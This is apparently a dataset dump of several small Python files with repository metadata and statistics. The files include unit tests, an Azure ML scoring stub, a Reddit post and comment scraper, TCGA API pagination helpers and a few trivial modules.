| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9e6a98bc6061481650f87e4c0ae2e06ff686b485
| 242
|
py
|
Python
|
tests/unit_tests/test_collection.py
|
RussTheAerialist/render_engine
|
426184c652bf5d2f812656f195e8b89827af33ff
|
[
"MIT"
] | null | null | null |
tests/unit_tests/test_collection.py
|
RussTheAerialist/render_engine
|
426184c652bf5d2f812656f195e8b89827af33ff
|
[
"MIT"
] | null | null | null |
tests/unit_tests/test_collection.py
|
RussTheAerialist/render_engine
|
426184c652bf5d2f812656f195e8b89827af33ff
|
[
"MIT"
] | null | null | null |
import pytest
def test_collection_kwargs_become_properties(base_collection):
assert base_collection.custom_val == 'custom'
def test_collection_sorts_alphabetically(base_collection):
assert base_collection.pages[0].slug == 'Title_C'
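# Both tests rely on a base_collection fixture defined elsewhere
# (typically conftest.py). From the assertions it must provide at least a
# custom_val attribute equal to 'custom' and a pages list whose first
# entry has slug 'Title_C'.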
| 30.25
| 62
| 0.822314
| 31
| 242
| 6
| 0.612903
| 0.301075
| 0.182796
| 0.258065
| 0.365591
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004587
| 0.099174
| 242
| 7
| 63
| 34.571429
| 0.848624
| 0
| 0
| 0
| 0
| 0
| 0.053719
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
7bac70b30b235bf7335957569d572d7df7d5ad44
| 103
|
py
|
Python
|
sdk/ml/azure-ai-ml/tests/test_configs/deployments/endpoint_scoring/do_nothing.py
|
dubiety/azure-sdk-for-python
|
62ffa839f5d753594cf0fe63668f454a9d87a346
|
[
"MIT"
] | 1
|
2022-02-01T18:50:12.000Z
|
2022-02-01T18:50:12.000Z
|
sdk/ml/azure-ai-ml/tests/test_configs/deployments/endpoint_scoring/do_nothing.py
|
ellhe-blaster/azure-sdk-for-python
|
82193ba5e81cc5e5e5a5239bba58abe62e86f469
|
[
"MIT"
] | null | null | null |
sdk/ml/azure-ai-ml/tests/test_configs/deployments/endpoint_scoring/do_nothing.py
|
ellhe-blaster/azure-sdk-for-python
|
82193ba5e81cc5e5e5a5239bba58abe62e86f469
|
[
"MIT"
] | null | null | null |
def init() -> None:
pass
def run(raw_data: list) -> list:
return [{"result": "Hello World"}]
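# Contract note: in an Azure ML scoring script, init() runs once at
# container start-up and run() runs per scoring request, e.g.:
#   init()
#   run([])  # -> [{"result": "Hello World"}]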
| 17.166667
| 39
| 0.572816
| 14
| 103
| 4.142857
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.23301
| 103
| 5
| 40
| 20.6
| 0.734177
| 0
| 0
| 0
| 0
| 0
| 0.165049
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.25
| 0
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
c876b0e70e2e3c1ce010ed45e6815b0f52c846d7
| 9,688
|
py
|
Python
|
scrape_reddit.py
|
JJWilliams27/Reddit_NLP
|
1a38804cfb2d99ff118cfc427c6cf03fc1ac0249
|
[
"MIT"
] | 1
|
2021-05-04T14:12:06.000Z
|
2021-05-04T14:12:06.000Z
|
scrape_reddit.py
|
JJWilliams27/Reddit_NLP
|
1a38804cfb2d99ff118cfc427c6cf03fc1ac0249
|
[
"MIT"
] | null | null | null |
scrape_reddit.py
|
JJWilliams27/Reddit_NLP
|
1a38804cfb2d99ff118cfc427c6cf03fc1ac0249
|
[
"MIT"
] | null | null | null |
'''
Extract posts from a specified subreddit, and extract all comments from each post
Author: Josh Williams
Date: 18/06/2019
Update: 18/06/2019
'''
# Import Modules
import praw
from psaw import PushshiftAPI
import pandas as pd
import datetime as dt
import os
# Options
save_posts = 1
save_comments = 1
get_top_submissions = 0
get_all_submissions = 1
get_comments_for_timeseries = 0
get_submissions_for_timeseries = 0
# All Posts
start_epoch = int(dt.datetime(2008, 1, 1).timestamp()) # Set start point for post extraction
number_of_submissions = None # Set number of posts (None = all posts)
# Create Functions
def get_date(created):
return dt.datetime.fromtimestamp(created)
# Set up Reddit API
reddit = praw.Reddit(client_id='INSERT_CLIENT_ID_HERE', \
client_secret='INSERT_CLIENT_SECRET_HERE', \
user_agent='INSERT_USER_AGENT_HERE', \
username='INSERT_USERNAME_HERE', \
password='INSERT_PASSWORD HERE')
api = PushshiftAPI(reddit) # Use Pushshift API to get around 1000 submission limit imposed by praw
# Access Climate Skepticism Subreddit
subreddit = reddit.subreddit('ClimateSkeptics')
# Loop through top submissions and append to output dataframe
if get_top_submissions == 1:
# Create Output Dictionary
topics_dict = { "title":[], \
"score":[], \
"id":[], "url":[], \
"comms_num": [], \
"created": [], \
"body":[]}
# Access Top x posts
print("Retrieving Submissions")
top_subreddit = subreddit.top(limit=500)
print("Appending Submissions to Dataframe")
count = 0
for submission in top_subreddit:
print(count)
path = os.getcwd()
conversedict = {}
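        # conversedict schema (inferred from the assignments below):
        #   {comment_id: [body, upvotes, created,
        #                 {child_comment_id: [upvotes, body, created]}]}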
dirname = path + '/Comments'
if not os.path.exists(dirname):
os.mkdir(dirname)
outname = dirname + '/' + submission.id + '.csv'
# Remove limit on comment extraction
submission.comments.replace_more(limit=None)
topics_dict["title"].append(submission.title)
topics_dict["score"].append(submission.score)
topics_dict["id"].append(submission.id)
topics_dict["url"].append(submission.url)
topics_dict["comms_num"].append(submission.num_comments)
topics_dict["created"].append(submission.created)
topics_dict["body"].append(submission.selftext)
temp_array = []
for comment in submission.comments.list():
temp_array.append(comment)
if comment.id not in conversedict:
comment.created = get_date(comment.created)
conversedict[comment.id] = [comment.body,comment.ups,comment.created,{}] # Original = [comment.body,{}]
if comment.parent() != submission.id:
parent = str(comment.parent())
conversedict[parent][3][comment.id] = [comment.ups, comment.body, comment.created]
#conversedict[comment.id] = [comment.body,{}]
#if comment.parent() != submission.id:
# parent = str(comment.parent())
# pdb.set_trace()
# conversedict[parent][1][comment.id] = [comment.ups, comment.body]
converse_df = pd.DataFrame(conversedict)
count = count+1
if save_comments == 1:
converse_df.to_csv('%s' %(outname), index=False)
# Convert Dictionary to Pandas Dataframe
print("Creating Dataframe")
topics_data = pd.DataFrame(topics_dict)
# Convert Date to Timestamp
_timestamp = topics_data["created"].apply(get_date)
topics_data = topics_data.assign(timestamp = _timestamp)
# Export as CSV
if save_posts == 1:
print("Saving as csv")
topics_data.to_csv('%sTop500Posts_Test.csv' %(subreddit), index=False)
if get_all_submissions == 1:
years=[2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019]
total_posts = []
for year in years:
print('Getting Submissions for %s' %(year))
start_epoch = int(dt.datetime(year, 1, 1).timestamp()) # Set start point for post extraction
end_epoch = int(dt.datetime(year,12,31).timestamp()) # Set end point
# Create Output Dictionary
topics_dict = { "title":[], \
"score":[], \
"id":[], "url":[], \
"comms_num": [], \
"created": [], \
"body":[]}
# Retrieve all posts within the year range
print("Retrieving Submissions")
all_subreddit = list(api.search_submissions(before=end_epoch,after=start_epoch,subreddit=subreddit,filter=['url','author','title','subreddit'],limit=number_of_submissions))
total_posts.append(len(all_subreddit))
print("Appending Submissions to Dataframe")
count = 1
num = len(all_subreddit)
for submission in all_subreddit:
print(str(count) + '/' + str(num))
path = os.getcwd()
dirname = path + '/Comments'
conversedict = {}
if not os.path.exists(dirname):
os.mkdir(dirname)
outname = dirname + '/' + submission.id + '.csv'
# Remove limit on comment extraction
submission.comments.replace_more(limit=None)
topics_dict["title"].append(submission.title)
topics_dict["score"].append(submission.score)
topics_dict["id"].append(submission.id)
topics_dict["url"].append(submission.url)
topics_dict["comms_num"].append(submission.num_comments)
topics_dict["created"].append(submission.created)
topics_dict["body"].append(submission.selftext)
temp_array = []
for comment in submission.comments.list():
temp_array.append(comment)
if comment.id not in conversedict:
try:
conversedict[comment.id] = [comment.body,comment.ups,comment.created,{}] # Original = [comment.body,{}]
if comment.parent() != submission.id:
parent = str(comment.parent())
conversedict[parent][3][comment.id] = [comment.ups, comment.body, comment.created]
except Exception:
pass # Skip if comment data is missing or malformed
converse_df = pd.DataFrame(conversedict)
count = count+1
if save_comments == 1:
converse_df.to_csv(outname, index=False)
# Convert Dictionary to Pandas Dataframe
print("Creating Dataframe")
topics_data = pd.DataFrame(topics_dict)
# Convert created epoch to a datetime timestamp
_timestamp = topics_data["created"].apply(get_date)
topics_data = topics_data.assign(timestamp = _timestamp)
if save_posts == 1:
print("Saving as csv")
topics_data.to_csv('%sAllPosts' %(subreddit) + str(year) + '.csv', index=False)
if get_comments_for_timeseries == 1:
# Create Output Dictionary
topics_dict = { "created":[], \
"score":[], \
"id":[], \
"body": []}
searches = ['IPCC','AR4','AR5'] # Kirilenko et al. (2015) use 'climate change' and 'global warming' as search terms
for search in searches:
# Search comments matching each term
print("Retrieving Comments")
all_subreddit_comments = list(api.search_comments(q=search,after=start_epoch,subreddit=subreddit,filter=['url','author','title','subreddit'],limit=number_of_submissions))
print("Appending Comments to Dataframe")
count = 0
num = len(all_subreddit_comments)
for submission in all_subreddit_comments:
print(str(count) + '/' + str(num))
path = os.getcwd()
dirname = path + '/Comments'
if not os.path.exists(dirname):
os.mkdir(dirname)
outname = dirname + '/' + submission.id + '.csv'
# Append comment fields to the output dictionary
topics_dict["created"].append(submission.created)
topics_dict["score"].append(submission.score)
topics_dict["id"].append(submission.id)
topics_dict["body"].append(submission.body)
count = count+1
# Convert Dictionary to Pandas Dataframe
print("Creating Dataframe")
topics_data = pd.DataFrame(topics_dict)
# Convert created epoch to a datetime timestamp
_timestamp = topics_data["created"].apply(get_date)
topics_data = topics_data.assign(timestamp = _timestamp)
# Export as CSV
if save_posts == 1:
print("Saving as csv")
topics_data.to_csv('%s_IPCC_Comments.csv' %(subreddit), index=False)
if get_submissions_for_timeseries == 1:
# Create Output Dictionary
topics_dict = { "created":[], \
"score":[], \
"id":[], "url":[], \
"comms_num": [], \
"title": [], \
"body":[]}
searches = ['IPCC','AR4','AR5'] # Kirilenko et al. (2015) use 'climate change' and 'global warming' as search terms
for search in searches:
# Search submissions matching each term
print("Retrieving Submissions")
all_subreddit = list(api.search_submissions(q=search,after=start_epoch,subreddit=subreddit,filter=['url','author','title','subreddit'],limit=number_of_submissions))
print("Appending Submissions to Dataframe")
count = 0
num = len(all_subreddit)
for submission in all_subreddit:
print(str(count) + '/' + str(num))
path = os.getcwd()
dirname = path + '/Comments'
if not os.path.exists(dirname):
os.mkdir(dirname)
outname = dirname + '/' + submission.id + '.csv'
# Append submission fields to the output dictionary
topics_dict["created"].append(submission.created)
topics_dict["title"].append(submission.title)
topics_dict["score"].append(submission.score)
topics_dict["id"].append(submission.id)
topics_dict["url"].append(submission.url)
topics_dict["comms_num"].append(submission.num_comments)
topics_dict["body"].append(submission.selftext)
count = count+1
# Convert Dictionary to Pandas Dataframe
print("Creating Dataframe")
topics_data = pd.DataFrame(topics_dict)
# Convert created epoch to a datetime timestamp
_timestamp = topics_data["created"].apply(get_date)
topics_data = topics_data.assign(timestamp = _timestamp)
# Export as CSV
if save_posts == 1:
print("Saving as csv")
topics_data.to_csv('%s_IPCC_Posts.csv' %(subreddit), index=False)
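The per-year CSVs written by the get_all_submissions branch can later be recombined for downstream analysis. A minimal sketch, assuming the files follow the '<subreddit>AllPosts<year>.csv' naming used above and sit in the working directory:

# Sketch: recombine the yearly exports into one DataFrame.
import glob
import pandas as pd

frames = [pd.read_csv(path) for path in sorted(glob.glob('*AllPosts*.csv'))]
all_posts = pd.concat(frames, ignore_index=True)
# 'timestamp' was added via topics_data.assign(...) above.
all_posts['timestamp'] = pd.to_datetime(all_posts['timestamp'])
print(all_posts.shape)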
| 34.848921
| 174
| 0.678881
| 1,209
| 9,688
| 5.294458
| 0.150538
| 0.051554
| 0.019997
| 0.017497
| 0.780191
| 0.759881
| 0.740509
| 0.730042
| 0.721918
| 0.709108
| 0
| 0.01598
| 0.186107
| 9,688
| 278
| 175
| 34.848921
| 0.795815
| 0.1859
| 0
| 0.713542
| 0
| 0
| 0.126804
| 0.011493
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005208
| false
| 0.010417
| 0.026042
| 0.005208
| 0.036458
| 0.109375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c87a1f174274f929d9f9e63497b398bcebed36a5
| 4,913
|
py
|
Python
|
BioClients/tcga/Utils.py
|
jeremyjyang/BioClients
|
b78ab2b948c79616fed080112e31d383346bec58
|
[
"CC0-1.0"
] | 10
|
2020-05-26T07:29:14.000Z
|
2021-12-06T21:33:40.000Z
|
BioClients/tcga/Utils.py
|
jeremyjyang/BioClients
|
b78ab2b948c79616fed080112e31d383346bec58
|
[
"CC0-1.0"
] | 1
|
2021-10-05T12:25:30.000Z
|
2021-10-05T17:05:56.000Z
|
BioClients/tcga/Utils.py
|
jeremyjyang/BioClients
|
b78ab2b948c79616fed080112e31d383346bec58
|
[
"CC0-1.0"
] | 2
|
2021-03-16T03:20:24.000Z
|
2021-08-08T20:17:10.000Z
|
#!/usr/bin/env python3
"""
Utility functions for TCGA REST API.
"""
import sys,os,re,json,time,logging
from ..util import rest
#
##############################################################################
def ListProjects(base_url, skip, nmax, fout):
n_out=0; tags=None;
from_next=skip; size=100;
while True:
url_next = (base_url+'/projects?from={0}&size={1}'.format(from_next, size))
rval = rest.Utils.GetURL(url_next, parse_json=True)
projects = rval["data"]["hits"] if "data" in rval and "hits" in rval["data"] else []
for project in projects:
logging.debug(json.dumps(project, indent=2))
if not tags:
tags = list(project.keys())
fout.write("\t".join(tags)+"\n")
vals = [(str(project[tag]) if tag in project else "") for tag in tags]
fout.write("\t".join(vals)+"\n")
n_out+=1
if n_out>=nmax: break
if n_out>=nmax: break
total = rval["data"]["pagination"]["total"] if "data" in rval and "pagination" in rval["data"] and "total" in rval["data"]["pagination"] else None
count = rval["data"]["pagination"]["count"] if "data" in rval and "pagination" in rval["data"] and "count" in rval["data"]["pagination"] else None
if not count or count<size: break
from_next += count
logging.info("n_out: %d / %s"%(n_out, total))
##############################################################################
def ListCases(base_url, skip, nmax, fout):
n_out=0; tags=None;
from_next=skip; size=100;
while True:
url_next = (base_url+'/cases?from={0}&size={1}'.format(from_next, size))
rval = rest.Utils.GetURL(url_next, parse_json=True)
cases = rval["data"]["hits"] if "data" in rval and "hits" in rval["data"] else []
for case in cases:
logging.debug(json.dumps(case, indent=2))
if not tags:
tags = list(case.keys())
fout.write("\t".join(tags)+"\n")
vals = [(str(case[tag]) if tag in case else "") for tag in tags]
fout.write("\t".join(vals)+"\n")
n_out+=1
if n_out>=nmax: break
if n_out>=nmax: break
total = rval["data"]["pagination"]["total"] if "data" in rval and "pagination" in rval["data"] and "total" in rval["data"]["pagination"] else None
count = rval["data"]["pagination"]["count"] if "data" in rval and "pagination" in rval["data"] and "count" in rval["data"]["pagination"] else None
if not count or count<size: break
from_next += count
logging.info("n_out: %d / %s"%(n_out, total))
##############################################################################
def ListFiles(base_url, skip, nmax, fout):
n_out=0; tags=None;
from_next=skip; size=100;
while True:
url_next = (base_url+'/files?from={0}&size={1}'.format(from_next, size))
rval = rest.Utils.GetURL(url_next, parse_json=True)
files = rval["data"]["hits"] if "data" in rval and "hits" in rval["data"] else []
for file_this in files:
logging.debug(json.dumps(file_this, indent=2))
if not tags:
tags = list(file_this.keys())
fout.write("\t".join(tags)+"\n")
vals = [(str(file_this[tag]) if tag in file_this else "") for tag in tags]
fout.write("\t".join(vals)+"\n")
n_out+=1
if n_out>=nmax: break
if n_out>=nmax: break
total = rval["data"]["pagination"]["total"] if "data" in rval and "pagination" in rval["data"] and "total" in rval["data"]["pagination"] else None
count = rval["data"]["pagination"]["count"] if "data" in rval and "pagination" in rval["data"] and "count" in rval["data"]["pagination"] else None
if not count or count<size: break
from_next += count
logging.info("n_out: %d / %s"%(n_out, total))
##############################################################################
def ListAnnotations(base_url, skip, nmax, fout):
n_out=0; tags=None;
from_next=skip; size=100;
while True:
url_next = (base_url+'/annotations?from={0}&size={1}'.format(from_next, size))
rval = rest.Utils.GetURL(url_next, parse_json=True)
annos = rval["data"]["hits"] if "data" in rval and "hits" in rval["data"] else []
for anno in annos:
logging.debug(json.dumps(anno, indent=2))
if not tags:
tags = list(anno.keys())
fout.write("\t".join(tags)+"\n")
vals = [(str(anno[tag]) if tag in anno else "") for tag in tags]
fout.write("\t".join(vals)+"\n")
n_out+=1
if n_out>=nmax: break
if n_out>=nmax: break
total = rval["data"]["pagination"]["total"] if "data" in rval and "pagination" in rval["data"] and "total" in rval["data"]["pagination"] else None
count = rval["data"]["pagination"]["count"] if "data" in rval and "pagination" in rval["data"] and "count" in rval["data"]["pagination"] else None
if not count or count<size: break
from_next += count
logging.info("n_out: %d / %s"%(n_out, total))
##############################################################################
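ListProjects, ListCases, ListFiles and ListAnnotations above differ only in the endpoint name and loop variable, so the pagination logic could be factored out. A minimal sketch, not part of the original module, reusing the same rest.Utils.GetURL helper:

def ListResources(base_url, endpoint, skip, nmax, fout):
    """Hypothetical generic pager over /projects, /cases, /files or /annotations."""
    n_out = 0; tags = None
    from_next = skip; size = 100
    while True:
        url_next = base_url+'/{0}?from={1}&size={2}'.format(endpoint, from_next, size)
        rval = rest.Utils.GetURL(url_next, parse_json=True)
        hits = rval["data"]["hits"] if "data" in rval and "hits" in rval["data"] else []
        for hit in hits:
            if not tags:
                tags = list(hit.keys())
                fout.write("\t".join(tags)+"\n")
            fout.write("\t".join([(str(hit[tag]) if tag in hit else "") for tag in tags])+"\n")
            n_out += 1
            if n_out >= nmax: break
        if n_out >= nmax: break
        pagination = rval.get("data", {}).get("pagination", {})
        count = pagination.get("count")
        if not count or count < size: break
        from_next += count
    logging.info("n_out: %d"%n_out)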
| 46.349057
| 150
| 0.577244
| 722
| 4,913
| 3.84349
| 0.112188
| 0.092252
| 0.072072
| 0.051892
| 0.833514
| 0.833514
| 0.833514
| 0.798919
| 0.798919
| 0.755676
| 0
| 0.008156
| 0.176471
| 4,913
| 105
| 151
| 46.790476
| 0.677706
| 0.011805
| 0
| 0.666667
| 0
| 0
| 0.161804
| 0.023564
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.022222
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c892cdc6da614381c22abda1ab43908dc48a4004
| 93
|
py
|
Python
|
tests/models.py
|
PetrDlouhy/dj-fiobank-payments
|
8047b39ecf2b690d143e2dd35d008c56aea44b27
|
[
"MIT"
] | null | null | null |
tests/models.py
|
PetrDlouhy/dj-fiobank-payments
|
8047b39ecf2b690d143e2dd35d008c56aea44b27
|
[
"MIT"
] | null | null | null |
tests/models.py
|
PetrDlouhy/dj-fiobank-payments
|
8047b39ecf2b690d143e2dd35d008c56aea44b27
|
[
"MIT"
] | null | null | null |
from dj_fiobank_payments.models import AbstractOrder
class Order(AbstractOrder):
pass
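A concrete subclass like this is the standard way to exercise an abstract Django model: AbstractOrder has no database table of its own, so tests need a real model to save. A hypothetical test sketch (field values are omitted because AbstractOrder's fields are defined upstream):

# Hypothetical test module; assumes the 'tests' app is installed for the test run.
from django.test import TestCase

class OrderModelTest(TestCase):
    def test_order_gets_a_table(self):
        order = Order()   # populate required AbstractOrder fields as needed
        order.save()
        self.assertIsNotNone(order.pk)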
| 13.285714
| 52
| 0.806452
| 11
| 93
| 6.636364
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150538
| 93
| 6
| 53
| 15.5
| 0.924051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
c8f487c15a8a4a365392b1aac0f7aa9de8f0a86d
| 70
|
py
|
Python
|
jsonfield/tests/__init__.py
|
peopledoc/django-jsonfield
|
031ef0f9460da5ad76edf5167e1847082c66be56
|
[
"BSD-3-Clause"
] | 31
|
2019-05-13T21:22:56.000Z
|
2021-07-14T02:57:19.000Z
|
jsonfield/tests/__init__.py
|
peopledoc/django-jsonfield
|
031ef0f9460da5ad76edf5167e1847082c66be56
|
[
"BSD-3-Clause"
] | 20
|
2019-03-16T11:11:19.000Z
|
2021-06-16T21:53:47.000Z
|
jsonfield/tests/__init__.py
|
peopledoc/django-jsonfield
|
031ef0f9460da5ad76edf5167e1847082c66be56
|
[
"BSD-3-Clause"
] | 25
|
2019-03-18T18:41:27.000Z
|
2022-03-16T10:28:09.000Z
|
from .test_fields import * # NOQA
from .test_forms import * # NOQA
| 23.333333
| 34
| 0.7
| 10
| 70
| 4.7
| 0.6
| 0.340426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 70
| 2
| 35
| 35
| 0.854545
| 0.128571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cdacb2d59f44e3a96a3e4fd53f1469c7cd235866
| 142
|
py
|
Python
|
hooks/__init__.py
|
leigingban/webtools
|
f8f20ee7837a924c7cb4bef9db7f6981fa892abd
|
[
"Apache-2.0"
] | null | null | null |
hooks/__init__.py
|
leigingban/webtools
|
f8f20ee7837a924c7cb4bef9db7f6981fa892abd
|
[
"Apache-2.0"
] | null | null | null |
hooks/__init__.py
|
leigingban/webtools
|
f8f20ee7837a924c7cb4bef9db7f6981fa892abd
|
[
"Apache-2.0"
] | null | null | null |
from .base import BaseHook
from .cookies import CookieSavingHook
from .debug import ShowDebugMsgHook
from .base import MY_PATH, MY_FILE_NAME
| 23.666667
| 39
| 0.838028
| 20
| 142
| 5.8
| 0.6
| 0.137931
| 0.241379
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126761
| 142
| 5
| 40
| 28.4
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a814a249447cb0b79e4dbab52ffedda4511226e1
| 98
|
py
|
Python
|
test.py
|
robmarkcole/google-map-downloader
|
c4bd02f3ec75b2bd61845d93c90a849e8367da73
|
[
"MIT"
] | 4
|
2021-11-09T13:36:21.000Z
|
2022-02-17T16:18:59.000Z
|
test.py
|
robmarkcole/google-map-downloader
|
c4bd02f3ec75b2bd61845d93c90a849e8367da73
|
[
"MIT"
] | null | null | null |
test.py
|
robmarkcole/google-map-downloader
|
c4bd02f3ec75b2bd61845d93c90a849e8367da73
|
[
"MIT"
] | null | null | null |
from downloader import *
main(100.361, 38.866, 100.386, 38.839, 13, 'test1.tif', server="Google")
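The positional arguments above are not named at the call site; from the values, they presumably describe a bounding box, zoom level, output file and tile server. An annotated sketch (argument meanings are inferred, not confirmed against the downloader source):

from downloader import main

main(
    100.361,          # left longitude of the bounding box (assumed)
    38.866,           # top latitude (assumed)
    100.386,          # right longitude (assumed)
    38.839,           # bottom latitude (assumed)
    13,               # zoom level
    'test1.tif',      # output GeoTIFF path
    server="Google",  # tile server
)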
| 32.666667
| 72
| 0.693878
| 17
| 98
| 4
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.287356
| 0.112245
| 98
| 3
| 72
| 32.666667
| 0.494253
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b534363d4c2e77fdcaffa888ca92a67ef6705f6a
| 221
|
py
|
Python
|
sample/libs/users/infrastructure/in_memory_user_logger.py
|
ticdenis/python-aiodi
|
4ad35145674f5ec0ed6324bec7dd186ab0a8bc33
|
[
"MIT"
] | 1
|
2021-11-10T00:21:34.000Z
|
2021-11-10T00:21:34.000Z
|
sample/libs/users/infrastructure/in_memory_user_logger.py
|
ticdenis/python-aiodi
|
4ad35145674f5ec0ed6324bec7dd186ab0a8bc33
|
[
"MIT"
] | 1
|
2022-01-29T15:40:26.000Z
|
2022-02-20T20:08:55.000Z
|
sample/libs/users/infrastructure/in_memory_user_logger.py
|
ticdenis/python-aiodi
|
4ad35145674f5ec0ed6324bec7dd186ab0a8bc33
|
[
"MIT"
] | null | null | null |
from logging import Logger
class InMemoryUserLogger:
__slots__ = '_logger'
def __init__(self, logger: Logger) -> None:
self._logger = logger
def logger(self) -> Logger:
return self._logger
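A minimal usage sketch for the wrapper above; in the sample project it is presumably wired through the aiodi container rather than constructed by hand:

import logging

base_logger = logging.getLogger("users")
user_logger = InMemoryUserLogger(base_logger)
user_logger.logger().info("user created")  # delegates to the wrapped Logger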
| 18.416667
| 47
| 0.660633
| 24
| 221
| 5.625
| 0.5
| 0.296296
| 0.237037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.253394
| 221
| 11
| 48
| 20.090909
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0.031674
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0.142857
| 0.857143
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
b5608e38697163bd594ceef357ea247aa10248ff
| 29
|
py
|
Python
|
print03.py
|
Mr-Umidjon/print_homework
|
b5f42bc12573663632d6c9e669a2ce5d85fe612e
|
[
"MIT"
] | null | null | null |
print03.py
|
Mr-Umidjon/print_homework
|
b5f42bc12573663632d6c9e669a2ce5d85fe612e
|
[
"MIT"
] | null | null | null |
print03.py
|
Mr-Umidjon/print_homework
|
b5f42bc12573663632d6c9e669a2ce5d85fe612e
|
[
"MIT"
] | null | null | null |
print('( _ )')
print(' ) (')
| 9.666667
| 14
| 0.37931
| 2
| 29
| 5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206897
| 29
| 2
| 15
| 14.5
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0.310345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
8d28f3c5cd2b38ca6f806597934563935be01cae
| 813
|
py
|
Python
|
tests/network/test_decode.py
|
richardkiss/bit
|
1836cee261edda46ad93da6253d62b2d0fc2ae39
|
[
"MIT"
] | null | null | null |
tests/network/test_decode.py
|
richardkiss/bit
|
1836cee261edda46ad93da6253d62b2d0fc2ae39
|
[
"MIT"
] | null | null | null |
tests/network/test_decode.py
|
richardkiss/bit
|
1836cee261edda46ad93da6253d62b2d0fc2ae39
|
[
"MIT"
] | 1
|
2022-02-26T16:31:11.000Z
|
